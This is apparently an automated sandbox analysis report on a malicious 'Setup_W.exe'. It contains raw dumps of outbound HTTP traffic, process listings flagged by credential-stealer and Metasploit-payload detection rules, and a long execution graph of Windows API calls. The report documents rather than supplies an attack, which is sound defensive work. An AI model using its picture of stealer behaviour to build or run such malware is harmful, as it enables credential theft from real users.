                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 89 f6 ac d1 aa c1 8d d6 19 89 30 66 1c 25 ed d3 94 e6 f8 ee 6f 8c 82 bf 9e 29 b2 8d 7f 30 7f 74 bd 0c f2 d8 24 a4 5e 9a 9f d2 1f d6 f7 04 b9 2e 9c 11 06 e5 b1 c1 62 8f 9f 34 d3 07 2c 24 3e 1c eb 45 fe df 01 69 52 5d ab 5b 27 3b 8b 3e bc ab 4b 51 2b 77 a7 f8 db 87 e1 7f de 15 c0 21 56 a0 75 88 79 bc 64 2a e9 b9 62 ec af 70 57 b1 35 7c 92 c9 b1 94 23 ea 45 23 63 c1 4a c8 5b d7 0f fd 9f f1 6a 5c ef f8 2e 92 bb 56 b3 91 b0 02 ea 12 a0 59 8b 05 76 6c f7 cf 37 a1 be d5 51 77 41 34 be a4 7b 6d 2e 99 a5 89 21 0e ac 14 df 22 a9 03 d0 b9 9a 63 15 41 95 a0 3b b0 1d 1e f7 a9 5d da cc 22 5a b6 4d 04 17 60 77 25 72 6c de a3 ad e3 0c 3e a2 1a cc fc b6 62 81 2d c8 15 21 35 c2 f6 fb b1 7c c7 c8 5a d4 80 2d 9e fe ef e2 b9 3e 20 a8 f0 1e 51 76 a3 e4 3e a9 ce 10 1d 7c 78 9f
                                                                                              Data Ascii: 0f%o)0t$^.b4,$>EiR][';>KQ+w!Vuyd*bpW5|#E#cJ[j\.VYvl7QwA4{m.!"cA;]"ZM`w%rl>b-!5|Z-> Qv>|x
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 90 d8 45 ff fa 0d 7b 55 4e 07 23 f6 fe 9e 75 51 a3 df ac 01 21 3a 72 6a b8 58 83 35 d3 4f f0 9b bf 6c 96 95 a6 1b eb c7 4e ed d5 0f 93 f8 fd eb 4f 7d 77 25 e5 7d 93 1f af 8a d6 e7 3f 39 38 1c fd 5e 52 e2 6e a5 28 df 87 0a 36 c3 7c 3d 4d 3d 45 27 02 c4 67 2e 42 c7 fa 0e b8 8f 0b 9d 51 03 28 72 e4 f4 36 ae 16 a9 1b ba 3b 8e 45 8a 0b 5c ef 6c ab 48 5d 71 69 db 05 0c 36 7e 2c 2c 23 d6 91 2b 48 e6 b2 1b 2f e2 8a fd c5 f7 97 30 e6 51 d8 f5 0b 8a 89 5b 39 0e e7 5b 36 ea 1f bb bc 5b 91 df 4a 50 b3 eb 7d f6 33 07 9f 98 a9 52 57 f4 43 a3 1b cc 63 81 f7 9f aa 78 b4 d5 37 ce 4f 5d 38 50 78 f0 bb d7 b9 4d 8d 95 ad cd 60 52 06 21 2f 79 70 f0 f7 72 68 2c 41 e3 00 a0 45 d6 48 2b 0d fe f3 99 15 3e e8 6e 5c 63 41 69 e3 10 1e 51 1e 5c df dc bd 60 b6 9f 5e ef e3 cb 41 2f ca
                                                                                              Data Ascii: E{UN#uQ!:rjX5OlNO}w%}?98^Rn(6|=M=E'g.BQ(r6;E\lH]qi6~,,#+H/0Q[9[6[JP}3RWCcx7O]8PxM`R!/yprh,AEH+>n\cAiQ\`^A/
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: c0 43 56 68 b7 f2 6b 73 54 31 92 17 39 24 94 6a dd 7d 8e 2c 50 d0 ab 40 a2 37 07 d9 46 ea 17 79 97 72 f4 55 83 8d 10 b5 75 bc 52 8f ae 63 f9 46 f9 83 2d f6 8a f4 1f 3e d2 2f 71 58 28 73 fe 9f f8 de 91 86 d5 54 65 f2 3d 65 9a 06 06 f0 7f e3 ba 2c ef e9 6f 68 d4 68 1e 50 65 5c bd f9 97 f0 ee 55 ae a9 44 c4 0f 39 08 01 a1 61 44 fe 5d 88 21 2b dc 5a c1 fe 3b 98 f2 2c 06 d6 db 8b 8b 28 b6 80 f0 9d 3c ec 17 fc 45 7a 4b c1 5e 12 eb 22 28 51 36 f7 67 78 d7 b0 d0 45 be cd c0 d7 f6 cf ff d6 40 f8 68 70 00 bb 91 b5 85 83 1c ef f2 28 db cc 0c 39 92 59 4f 8f 88 98 7f 35 15 43 d5 89 60 6f 1c e3 da cb 51 a1 7a fa 49 c3 cf a2 a3 4f df 40 35 fa d5 51 4e da 86 4f a2 5e 62 81 0f 39 a9 4d 02 d8 ec cd 42 10 3c 24 79 98 79 41 78 4c bb 36 fb ac b0 60 e2 27 c3 0a 36 b9 cd 85 68
                                                                                              Data Ascii: CVhksT19$j},P@7FyrUuRcF->/qX(sTe=e,ohhPe\UD9aD]!+Z;,(<EzK^"(Q6gxE@hp(9YO5C`oQzIO@5QNO^b9MB<$yyAxL6`'6h
                                                                                              2024-12-24 01:56:51 UTC15331OUTData Raw: 68 f0 e7 bc c8 a1 de 58 af 43 63 fc 38 57 e7 3a 5f fe b7 d9 89 f7 aa ff e2 08 a5 51 a2 02 2b 0b 8b 2c 94 eb 65 64 c7 64 6a 76 64 66 02 62 e5 96 af 44 e6 cd 1f 9c aa c0 7b 34 8b 8b 77 d1 c1 49 39 20 69 b7 62 3c 13 01 96 04 ba 16 5b 5c c9 fb a0 37 10 fb cf 33 b8 e2 f7 71 82 de c6 be f1 7b 5b 84 54 fd 21 ce 48 ff f8 ef d1 7e 49 03 14 f3 07 55 6d 0c 4a 97 50 a2 df f5 c7 96 b3 aa a8 7f d8 4e 89 5f fb 13 7f af e5 6e 4d db 2b 06 50 18 a5 7b fb 5f 79 85 f6 b3 56 84 15 7d 08 c1 5f 9d 21 14 bb 3a 06 26 23 d8 eb c2 0a 64 ca c6 56 40 d5 3c 9b 43 99 0c f3 5e e1 1b f7 dc a4 a6 56 7d 36 a5 f5 fd 1e 76 ca c4 c0 01 9f 06 ea 69 84 35 3a d7 98 ae d0 1f fc d3 fd 7b c4 81 3a 6e af 80 a8 f9 39 10 d0 0d 2d 4b 80 02 47 ea ef ea a9 ac 27 7a 3d 20 b3 f2 f3 e5 2d bf 8f e8 5c f1 f0
                                                                                              Data Ascii: hXCc8W:_Q+,eddjvdfbD{4wI9 ib<[\73q{[T!H~IUmJPN_nM+P{_yV}_!:&#dV@<C^V}6vi5:{:n9-KG'z= -\
                                                                                              2024-12-24 01:57:01 UTC1139INHTTP/1.1 200 OK
                                                                                              Date: Tue, 24 Dec 2024 01:57:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=94lipru1k41sklam4m5ji6b661; expires=Fri, 18 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BKlwTx%2FHlPTr1vrNhtmrJAD2mXbAch3q6KzrzUZ%2BjZCcZ2AynU2O4yb%2Fr4bNLdIVN%2Bws6DIvN%2BDe7Hfr6Tb5nv9lcHwjp0Y5s2mpGB3y9TU0Th%2Fz3THYmyiUL%2FPaBTmYGtqW"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f6cfa2c2d6b4333-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1605&rtt_var=627&sent=308&recv=573&lost=0&retrans=0&sent_bytes=2841&recv_bytes=553910&delivery_rate=1819314&cwnd=248&unsent_bytes=0&cid=efb9094a1da34245&ts=9984&x=0"


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:20:56:04
                                                                                              Start date:23/12/2024
                                                                                              Path:C:\Users\user\Desktop\Setup_W.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\Setup_W.exe"
                                                                                              Imagebase:0x990000
                                                                                              File size:32'077'826 bytes
                                                                                              MD5 hash:BCB408AAD4A09A615ECAAB20C8016C3B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:4
                                                                                              Start time:20:56:28
                                                                                              Start date:23/12/2024
                                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                              Imagebase:0x510000
                                                                                              File size:231'736 bytes
                                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2145451743.00000000032DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2145593469.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:6%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:5.7%
                                                                                                Total number of Nodes:1699
                                                                                                Total number of Limit Nodes:33
                                                                                                execution_graph 7138 64606e60 7139 64606e6e 7138->7139 7140 64606e94 7139->7140 7141 64606eac 7139->7141 7142 64602ef4 6 API calls 7140->7142 7147 64606bcb 7141->7147 7144 64606ea8 7142->7144 7145 64606eb8 7145->7144 7146 64606ed6 GetProcAddress 7145->7146 7146->7144 7148 64606be5 LoadLibraryA 7147->7148 7155 64606c19 7147->7155 7149 64606bfc 7148->7149 7150 64606c1e GetProcAddress 7148->7150 7153 64602ef4 6 API calls 7149->7153 7149->7155 7151 64606c44 7150->7151 7152 64606c3a 7150->7152 7151->7152 7156 64606c79 7151->7156 7154 64602ef4 6 API calls 7152->7154 7153->7155 7157 64606c74 7154->7157 7155->7145 7159 64606cc3 calloc 7156->7159 7162 64606c98 7156->7162 7158 64606a9c FreeLibrary 7157->7158 7158->7155 7160 64606ced 7159->7160 7161 64606d01 7160->7161 7167 64606cf4 7160->7167 7166 64602ef4 6 API calls 7161->7166 7162->7157 7163 64602ef4 6 API calls 7162->7163 7163->7157 7164 64606d30 strcmp 7164->7167 7168 64606d5a strcmp 7164->7168 7165 64606d58 free 7165->7155 7170 64606d21 free 7166->7170 7167->7164 7167->7165 7168->7167 7170->7157 7183 64603a64 7184 64603a79 7183->7184 7186 64603a8f 7183->7186 7185 64602ef4 6 API calls 7184->7185 7187 64603a8d 7185->7187 7186->7187 7188 64602ef4 6 API calls 7186->7188 7188->7187 7189 64603e64 7190 64603e78 7189->7190 7191 64603e8e 7189->7191 7192 64602ef4 6 API calls 7190->7192 7193 64603eb5 7191->7193 7194 64603ea1 glfwSetCursor 7191->7194 7196 64603e8c 7191->7196 7192->7196 7197 6460e25c 7193->7197 7194->7191 7198 6460e276 7197->7198 7199 6460e26c DestroyIcon 7197->7199 7198->7196 7199->7198 7209 6460e06e MsgWaitForMultipleObjects 7210 64606070 7211 64606082 7210->7211 7212 64606151 7211->7212 7214 6460616f 7211->7214 7213 64602ef4 6 API calls 7212->7213 7215 6460616d 7213->7215 7214->7215 7217 6460ab26 CreateDCW GetDeviceGammaRamp DeleteDC 7214->7217 7220 646056e7 calloc calloc calloc 7217->7220 7219 6460ab90 7219->7214 7220->7219 7221 64602071 7222 6460ad78 TlsGetValue 7221->7222 7223 64602087 7222->7223 7224 64602091 7223->7224 7225 6460209d GetProcAddress 7223->7225 7225->7224 7226 64611677 7227 64611680 7226->7227 7228 646116a2 7227->7228 7229 64611320 7227->7229 7230 64611aa0 _errno 7228->7230 7234 646119d8 7228->7234 7233 6461137a 7229->7233 7235 64611c20 7229->7235 7232 64611aef 7230->7232 7236 64611c35 7235->7236 7236->7233 7237 64611c82 _errno 7236->7237 7237->7233 7238 64611c76 7239 64611c80 _errno 7238->7239 6327 6460ec78 6328 6460ec8d 6327->6328 6329 6460ecf7 6328->6329 6330 6460ed0d 6328->6330 6426 64602ef4 6329->6426 6332 6460ed17 6330->6332 6334 6460ed3d 6330->6334 6335 64602ef4 6 API calls 6332->6335 6353 64601440 6334->6353 6336 6460ed36 6335->6336 6339 6460edab calloc 6370 6460c519 6339->6370 6342 6460ee9b glfwDestroyWindow 6342->6336 6343 6460eea8 6345 6460eec1 6343->6345 6346 6460eeae 6343->6346 6345->6336 6348 6460eeca 6345->6348 6346->6336 6467 646037ac 6346->6467 6472 6460c46e ShowWindow 6348->6472 6351 6460eed2 6351->6336 6473 6460c4da BringWindowToTop SetForegroundWindow SetFocus 6351->6473 6364 64601453 6353->6364 6354 64601461 6357 64602ef4 6 API calls 6354->6357 6355 64601483 6356 64602ef4 6 API calls 6355->6356 6359 6460161d 6356->6359 6361 64601559 6357->6361 6358 646015ce 6358->6355 6358->6359 6359->6336 6359->6339 6360 646014f9 6363 64602ef4 6 API calls 6360->6363 6361->6359 6362 646014a1 6362->6355 6362->6358 6362->6360 6363->6361 6364->6354 6364->6355 6364->6360 6364->6362 6365 6460150e 6364->6365 6366 6460155e 6365->6366 6369 64601515 6365->6369 6366->6358 6367 64601569 6366->6367 6368 64602ef4 6 API calls 6367->6368 6368->6361 6369->6354 6369->6355 6369->6358 6371 6460c532 6370->6371 6372 6460c545 6371->6372 6373 6460c57b 6371->6373 6484 6460a6a5 EnumDisplaySettingsExW 6372->6484 6488 6460b1d6 6373->6488 6377 6460c56d 6474 64608385 MultiByteToWideChar 6377->6474 6381 6460c5d7 GetModuleHandleW CreateWindowExW free 6383 6460c681 SetPropW 6381->6383 6384 6460c666 6381->6384 6382 6460c67a 6382->6342 6382->6343 6438 64601b16 6382->6438 6482 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6383->6482 6494 64608298 GetLastError FormatMessageW WideCharToMultiByte 6384->6494 6387 6460c6b5 6388 6460c737 6387->6388 6389 6460c6b9 ChangeWindowMessageFilterEx ChangeWindowMessageFilterEx ChangeWindowMessageFilterEx 6387->6389 6390 6460c8ac DragAcceptFiles 6388->6390 6391 6460c790 6388->6391 6497 6460c3c4 MonitorFromWindow 6388->6497 6389->6388 6392 6460c8ce 6390->6392 6393 6460c8d5 6390->6393 6483 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6391->6483 6498 6460b89f 6392->6498 6396 6460c8e7 6393->6396 6398 6460c921 6393->6398 6399 6460c946 6393->6399 6396->6382 6397 6460c8f1 6396->6397 6397->6396 6507 6460c46e ShowWindow 6397->6507 6518 6460737c 6398->6518 6402 6460c972 6399->6402 6403 6460c94d 6399->6403 6402->6396 6407 6460c97d 6402->6407 6588 646021f7 6403->6588 6405 6460c8f9 6508 6460c4da BringWindowToTop SetForegroundWindow SetFocus 6405->6508 6633 646064fa 6407->6633 6413 6460c802 6416 6460c806 GetDpiForWindow 6413->6416 6417 6460c849 AdjustWindowRectEx 6413->6417 6414 6460c901 6509 6460b0a6 6414->6509 6423 6460c844 6416->6423 6422 6460c868 GetWindowPlacement SetWindowPlacement 6417->6422 6421 6460c908 6517 6460af9b GetMonitorInfoW SetWindowPos 6421->6517 6422->6390 6423->6422 6425 6460c90f 6425->6382 6427 64602f10 6426->6427 6428 6460306c strcpy 6427->6428 6699 6460ad78 6427->6699 6429 64603087 6428->6429 6429->6336 6431 6460301b 6431->6428 6432 64603021 calloc 6431->6432 6702 6460adb6 6432->6702 6434 64603047 6705 6460ae74 6434->6705 6436 64603053 6708 6460aeb2 6436->6708 6439 6460ad78 TlsGetValue 6438->6439 6440 64601b53 glfwMakeContextCurrent 6439->6440 6441 64601b6a 6440->6441 6445 64601bab 6441->6445 6446 64601c11 sscanf 6441->6446 6447 64601bd6 strlen strncmp 6441->6447 6442 64602ef4 6 API calls 6443 64601d14 glfwMakeContextCurrent 6442->6443 6444 64601ec6 6443->6444 6444->6342 6444->6343 6445->6442 6449 64601c45 6446->6449 6450 64601c7c 6446->6450 6447->6441 6448 64601c04 6447->6448 6448->6446 6453 64602ef4 6 API calls 6449->6453 6451 64601c9c 6450->6451 6452 64601ce4 6450->6452 6454 64602ef4 6 API calls 6451->6454 6452->6445 6460 64601d23 6452->6460 6455 64601c6f glfwMakeContextCurrent 6453->6455 6456 64601ce2 6454->6456 6455->6444 6456->6443 6458 64601e4f glfwExtensionSupported 6459 64601e5f glfwMakeContextCurrent 6458->6459 6459->6444 6461 64601d67 6460->6461 6462 64601dcd glfwExtensionSupported 6460->6462 6463 64601d73 glfwExtensionSupported 6460->6463 6461->6462 6464 64601de9 glfwExtensionSupported 6461->6464 6462->6458 6465 64601e12 6462->6465 6463->6461 6464->6462 6465->6458 6711 6460c043 GetClientRect 6467->6711 6471 646037ea 6471->6336 6472->6351 6473->6336 6475 646083e1 calloc MultiByteToWideChar 6474->6475 6476 646083cb 6474->6476 6478 646083df 6475->6478 6479 64608424 6475->6479 6477 64608298 9 API calls 6476->6477 6477->6478 6478->6381 6478->6382 6480 64608298 9 API calls 6479->6480 6481 64608438 free 6480->6481 6481->6478 6482->6387 6483->6413 6485 6460a6fb 6484->6485 6486 6460a79f EnumDisplaySettingsW 6485->6486 6487 6460a816 6486->6487 6487->6377 6649 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6488->6649 6490 6460b205 6491 6460b231 AdjustWindowRectEx 6490->6491 6492 6460b20c AdjustWindowRectExForDpi 6490->6492 6493 6460b24d 6491->6493 6492->6493 6493->6377 6495 64602ef4 6 API calls 6494->6495 6496 6460837e 6495->6496 6496->6382 6650 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6498->6650 6500 6460ba22 6500->6393 6501 6460b8c5 6501->6500 6502 6460b9bc GetWindowLongW SetWindowLongW RedrawWindow 6501->6502 6503 6460b8ec CreateRectRgn 6501->6503 6502->6500 6504 6460b944 6503->6504 6505 6460b9b0 DeleteObject 6504->6505 6506 6460b94a GetWindowLongW SetWindowLongW SetLayeredWindowAttributes 6504->6506 6505->6500 6506->6505 6507->6405 6508->6414 6510 6460b135 6509->6510 6511 6460b0b9 SetThreadExecutionState 6509->6511 6652 6460a81d 6510->6652 6651 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6511->6651 6513 6460b0e3 6513->6510 6515 6460b0e7 SystemParametersInfoW SystemParametersInfoW 6513->6515 6515->6510 6516 6460b153 6516->6421 6517->6425 6519 64607397 LoadLibraryA 6518->6519 6529 646074dc 6518->6529 6520 646073bb 10 API calls 6519->6520 6521 646073ae 6519->6521 6522 646074e1 6520->6522 6523 646074c8 6520->6523 6524 64608298 9 API calls 6521->6524 6522->6521 6526 6460750c 6522->6526 6525 64608298 9 API calls 6523->6525 6524->6529 6525->6529 6527 64607533 6526->6527 6530 6460756b 6526->6530 6528 64608298 9 API calls 6527->6528 6528->6529 6529->6382 6554 646076e0 6529->6554 6679 64607101 6530->6679 6533 64607101 2 API calls 6534 646075ec 6533->6534 6535 64607101 2 API calls 6534->6535 6536 646075fd 6535->6536 6537 64607101 2 API calls 6536->6537 6538 6460760e 6537->6538 6539 64607101 2 API calls 6538->6539 6540 6460761f 6539->6540 6541 64607101 2 API calls 6540->6541 6542 64607630 6541->6542 6543 64607101 2 API calls 6542->6543 6544 64607641 6543->6544 6545 64607101 2 API calls 6544->6545 6546 64607652 6545->6546 6547 64607101 2 API calls 6546->6547 6548 64607663 6547->6548 6549 64607101 2 API calls 6548->6549 6550 64607674 6549->6550 6551 64607101 2 API calls 6550->6551 6552 64607685 6551->6552 6553 64607101 2 API calls 6552->6553 6553->6529 6555 64607708 GetDC 6554->6555 6556 646076fc 6554->6556 6557 6460773c 6555->6557 6586 64607728 6555->6586 6556->6555 6558 646078d4 DescribePixelFormat 6557->6558 6570 6460774a 6557->6570 6559 646078fe calloc 6558->6559 6587 6460792e 6559->6587 6560 64602ef4 6 API calls 6573 64607792 6560->6573 6561 64607c6c DescribePixelFormat 6563 646079a5 6561->6563 6561->6587 6562 64607d93 6565 64602ef4 6 API calls 6562->6565 6568 64608298 9 API calls 6563->6568 6564 64608298 9 API calls 6577 64607db5 6564->6577 6567 64607da7 free 6565->6567 6566 64607d8a 6566->6562 6569 64607df0 free 6566->6569 6567->6577 6571 64607cae free 6568->6571 6572 64607e09 DescribePixelFormat 6569->6572 6569->6577 6570->6559 6570->6573 6571->6577 6574 64607e51 SetPixelFormat 6572->6574 6575 64607e38 6572->6575 6573->6564 6573->6577 6574->6573 6579 64607e81 6574->6579 6576 64608298 9 API calls 6575->6576 6576->6577 6577->6397 6578 64607e9d 6580 64602ef4 6 API calls 6578->6580 6579->6578 6581 64607ed4 6579->6581 6580->6577 6581->6573 6581->6577 6582 646080e8 GetLastError 6581->6582 6581->6586 6583 646080f5 6582->6583 6582->6586 6585 64602ef4 6 API calls 6583->6585 6584 64607305 9 API calls 6584->6587 6585->6586 6586->6560 6587->6561 6587->6563 6587->6566 6587->6584 6589 64602229 6588->6589 6597 64602263 6588->6597 6590 64602245 6589->6590 6591 6460222f LoadLibraryA 6589->6591 6592 64602268 17 API calls 6590->6592 6593 6460224f 6590->6593 6591->6589 6591->6590 6595 6460242b 6592->6595 6596 646024ae 6592->6596 6594 64602ef4 6 API calls 6593->6594 6594->6597 6595->6596 6601 646024ce 6595->6601 6598 64602ef4 6 API calls 6596->6598 6597->6382 6614 646025a0 6597->6614 6608 646024c2 6598->6608 6600 646024e1 6605 64602ef4 6 API calls 6600->6605 6601->6600 6602 6460253f 6601->6602 6692 64601fb6 6602->6692 6605->6608 6606 64601fb6 2 API calls 6607 6460255c 6606->6607 6609 64601fb6 2 API calls 6607->6609 6688 646021b5 6608->6688 6610 6460256d 6609->6610 6611 64601fb6 2 API calls 6610->6611 6612 6460257e 6611->6612 6613 64601fb6 2 API calls 6612->6613 6613->6597 6615 646025c9 6614->6615 6620 646025b5 6614->6620 6617 64602622 calloc 6615->6617 6618 64602609 6615->6618 6616 64602ef4 6 API calls 6626 64602820 6616->6626 6621 64602652 calloc 6617->6621 6619 64602ef4 6 API calls 6618->6619 6619->6620 6620->6616 6624 64602685 6621->6624 6622 646027ec free free 6622->6620 6623 64602825 6622->6623 6627 64602843 6623->6627 6631 64602b5c 6623->6631 6624->6622 6625 64602ef4 6 API calls 6625->6626 6626->6397 6627->6625 6628 64602bcd strncmp 6630 64602c00 LoadLibraryA 6628->6630 6628->6631 6629 64602bfe 6629->6626 6632 64602ef4 6 API calls 6629->6632 6630->6626 6630->6631 6631->6626 6631->6628 6631->6629 6632->6626 6634 64606542 6633->6634 6635 64606522 6633->6635 6636 64606548 6634->6636 6637 6460652c LoadLibraryA 6634->6637 6635->6382 6645 6460666f 6635->6645 6638 64606551 6636->6638 6639 6460656a 7 API calls 6636->6639 6637->6634 6637->6636 6640 64602ef4 6 API calls 6638->6640 6642 64606623 6639->6642 6640->6635 6641 64602ef4 6 API calls 6643 64606663 6641->6643 6642->6635 6642->6641 6696 646064d4 6643->6696 6648 6460669e 6645->6648 6646 64602ef4 6 API calls 6647 64606847 6646->6647 6647->6396 6648->6646 6648->6647 6649->6490 6650->6501 6651->6513 6661 6460596b 6652->6661 6655 6460a79f EnumDisplaySettingsW 6657 6460a84f 6655->6657 6656 6460a8e2 6656->6516 6657->6656 6658 6460a8b3 ChangeDisplaySettingsExW 6657->6658 6658->6656 6660 6460a8ee 6658->6660 6659 64602ef4 6 API calls 6659->6656 6660->6659 6662 646059b2 6661->6662 6664 64605981 6661->6664 6665 64605633 6662->6665 6664->6655 6670 6460a958 6665->6670 6668 64605650 qsort free 6669 6460568c 6668->6669 6669->6664 6671 6460a98b EnumDisplaySettingsW 6670->6671 6672 6460aae4 6671->6672 6675 6460a9cd 6671->6675 6673 6460564c 6672->6673 6674 6460aae9 calloc 6672->6674 6673->6668 6673->6669 6676 6460a79f EnumDisplaySettingsW 6674->6676 6675->6671 6677 6460aa58 ChangeDisplaySettingsExW 6675->6677 6678 6460aa98 realloc 6675->6678 6676->6673 6677->6671 6677->6675 6678->6675 6681 64607112 6679->6681 6680 64607129 6680->6533 6681->6680 6683 646017ee 6681->6683 6684 646017fd strstr 6683->6684 6685 6460180f strlen 6684->6685 6687 6460182e 6684->6687 6686 6460181d 6685->6686 6686->6684 6686->6687 6687->6680 6691 646021c4 6688->6691 6689 646021e1 FreeLibrary 6690 646021f5 6689->6690 6690->6597 6691->6689 6691->6690 6693 64601fd2 6692->6693 6694 64601fe9 6693->6694 6695 646017ee 2 API calls 6693->6695 6694->6606 6695->6694 6697 646064f9 6696->6697 6698 646064dd FreeLibrary 6696->6698 6697->6635 6698->6635 6700 6460ada4 TlsGetValue 6699->6700 6701 6460ad87 6699->6701 6700->6431 6701->6700 6703 6460ade2 TlsSetValue 6702->6703 6704 6460adc5 6702->6704 6703->6434 6704->6703 6706 6460aea0 EnterCriticalSection 6705->6706 6707 6460ae83 6705->6707 6706->6436 6707->6706 6709 6460aec1 6708->6709 6710 6460aede LeaveCriticalSection 6708->6710 6709->6710 6710->6428 6712 646037cc 6711->6712 6713 6460d093 ClientToScreen SetCursorPos 6712->6713 6713->6471 7250 6460ce42 GetWindowLongW 7251 6460ce6b 7250->7251 7252 6460ce6f GetLayeredWindowAttributes 7250->7252 7252->7251 7271 6460d459 7272 6460d462 7271->7272 7274 6460d410 7272->7274 7275 6460b019 GetKeyState GetKeyState 7272->7275 7276 6460b047 7275->7276 7277 6460b04a GetKeyState 7275->7277 7276->7277 7278 6460b059 7277->7278 7279 6460b05c GetKeyState GetKeyState 7277->7279 7278->7279 7280 6460b077 7279->7280 7281 6460b07a GetKeyState 7279->7281 7280->7281 7282 6460b088 7281->7282 7283 6460b08b GetKeyState 7281->7283 7282->7283 7284 6460b099 7283->7284 7284->7274 7285 64610a5b 7291 6461099f 7285->7291 7286 646107e0 11 API calls 7286->7291 7287 64610a9d 7288 64610ad2 VirtualProtect 7287->7288 7290 64610935 7287->7290 7288->7287 7291->7286 7291->7287 7291->7290 7292 64610b30 7291->7292 7294 64610b82 7291->7294 7297 64610780 7291->7297 7292->7287 7292->7290 7323 646107e0 7292->7323 7295 64610780 11 API calls 7294->7295 7296 64610b92 7295->7296 7345 64611f20 7297->7345 7299 64610794 fwrite 7346 64611f20 7299->7346 7301 646107c0 vfprintf abort 7307 646107e0 7301->7307 7302 64610888 7302->7291 7303 64610907 7304 64610780 4 API calls 7303->7304 7312 64610917 7304->7312 7305 64610847 VirtualQuery 7306 646108e7 7305->7306 7305->7307 7306->7303 7308 64610780 4 API calls 7306->7308 7307->7302 7307->7303 7307->7305 7309 64610896 VirtualProtect 7307->7309 7308->7303 7309->7302 7310 646108ca GetLastError 7309->7310 7310->7307 7311 64610780 4 API calls 7310->7311 7311->7307 7313 64610935 7312->7313 7314 64610b30 7312->7314 7315 64610b82 7312->7315 7319 64610a9d 7312->7319 7320 646107e0 VirtualQuery VirtualProtect GetLastError VirtualProtect 7312->7320 7321 64610780 4 API calls 7312->7321 7313->7291 7314->7313 7317 646107e0 4 API calls 7314->7317 7314->7319 7316 64610780 4 API calls 7315->7316 7318 64610b92 7316->7318 7317->7314 7319->7313 7322 64610ad2 VirtualProtect 7319->7322 7320->7312 7321->7312 7322->7319 7328 646107f6 7323->7328 7324 64610888 7324->7292 7325 64610907 7326 64610780 7 API calls 7325->7326 7340 64610917 7326->7340 7327 64610847 VirtualQuery 7327->7328 7329 646108e7 7327->7329 7328->7324 7328->7325 7328->7327 7331 64610896 VirtualProtect 7328->7331 7329->7325 7330 64610780 7 API calls 7329->7330 7330->7325 7331->7324 7332 646108ca GetLastError 7331->7332 7332->7328 7333 64610780 7 API calls 7332->7333 7333->7328 7334 64610b30 7337 646107e0 7 API calls 7334->7337 7342 64610a9d 7334->7342 7344 64610935 7334->7344 7335 64610b82 7336 64610780 7 API calls 7335->7336 7338 64610b92 7336->7338 7337->7334 7339 646107e0 7 API calls 7339->7340 7340->7334 7340->7335 7340->7339 7341 64610780 7 API calls 7340->7341 7340->7342 7340->7344 7341->7340 7343 64610ad2 VirtualProtect 7342->7343 7342->7344 7343->7342 7344->7292 7345->7299 7346->7301 7347 6460e05c WaitMessage 7353 6460d621 7354 6460d62f 7353->7354 7355 6460d6a3 7354->7355 7356 6460d690 SetCapture 7354->7356 7357 6460b019 7 API calls 7355->7357 7356->7355 7358 6460d6ab 7357->7358 7359 6460d6d7 7358->7359 7360 6460d6d1 ReleaseCapture 7358->7360 7360->7359 7361 6460c222 7362 6460c232 7361->7362 7363 6460c299 7361->7363 7362->7363 7364 6460c238 GetWindowRect 7362->7364 7367 6460b56d 7364->7367 7374 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7367->7374 7369 6460b591 7370 6460b59a GetDpiForWindow 7369->7370 7371 6460b5ac 7369->7371 7370->7371 7372 